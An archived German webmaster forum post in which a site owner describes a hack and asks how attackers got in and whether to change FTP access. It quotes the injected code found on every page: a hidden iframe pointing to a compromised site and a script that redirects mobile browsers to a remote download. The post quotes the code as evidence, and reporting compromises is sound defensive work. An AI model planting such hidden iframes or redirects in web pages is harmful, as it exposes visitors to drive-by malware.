Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

gehacked - Strategie danach?

Forum rund um das Thema Hardware für Webmaster.
Neues Thema Antworten
depp ich
PostRank 9
PostRank 9
Beiträge: 1508
Registriert: 06.12.2004, 12:59

Beitrag von depp ich » 12.03.2012, 09:54

Gestern hat ein Dumpfsack an alle Seiten unten ein Stückchen Code angehängt:

Code: Alles auswählen

<iframe name="SagUTeXYne" src="http&#58;//aandmcleaning.co.uk/templates/rhuk_milkyway/lite/index.php?out=1328461192" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no"></iframe>
<script type="text/javascript">
<!--
if&#40;navigator.userAgent.match&#40;/&#40;android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|windows phone&#41;/i&#41;!==null&#41;&#123;
  window.location = "http&#58;//geie.net/load/u/2493/load.auto";
&#125;
//-->
</script>
Fiel bei den meisten Seiten nur durch längere Ladezeit auf, bei ein paar kam es zu php-Fehlermeldungen.

Der unmittelbare Schaden war schnell behoben, das gesamte Werkel durchsehen und ev. Backup einspielen wird mehr arbeit sein.


Ja - die Frage:
Wie kommen die Hacker überhaupt rein? (über FTP?)
Macht es Sinn, den FTP-Zugang zu ändern?

Wenn über ein Script - wo soll ich suchen? Zeitlich passen würde ein PagePeel-Script, das ich vor ein paar Tagen aktiviert habe.

Das verwendete CMS hat bekannte Lücken, allerdings wurde damit noch nie so eine Art Angriff gemacht. Der Hacker schien gar nicht zu wissen, welches CMS da läuft. Die Datenbank ist unberührt.

Ich möchte jetzt keinen großen Panik!-Rumdumallesneu-Schlag machen. Das ist keine Site, wo es irgendwas tolles zum holen gibt. Loch zu und genug wäre mir lieber.